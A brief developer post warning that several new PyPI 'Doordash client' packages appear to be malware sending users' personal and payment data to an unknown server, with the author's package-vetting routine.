| I wanted to setup a slackbot to manager Doordash orders for our company. Starting with PyPi "Doordash Client": https://pypi.org/search/?q=doordash+client I was excited by 5 recently published packages. As I usually do, I checked them out via Github... buut, hit a deadlink Quick inspection of the package clearly shows a random server handles all the requests made including your PII, address, credit card info -- 99% chance this is malware. World's moving fast these days, and AI is making it easier for everyone - even the bad actors - to make what looks like polish OSS. My typical workflow selecting packages is: 1. Check out their Github - social credit means a lot to me 2. Clone the repo, and ask `claude`, `cursor` or whichever agent I'm using at the time for a quick audit 3. If I'm putting my own credentials of a PAT in there, review it myself at the top level too Stay safe folks! |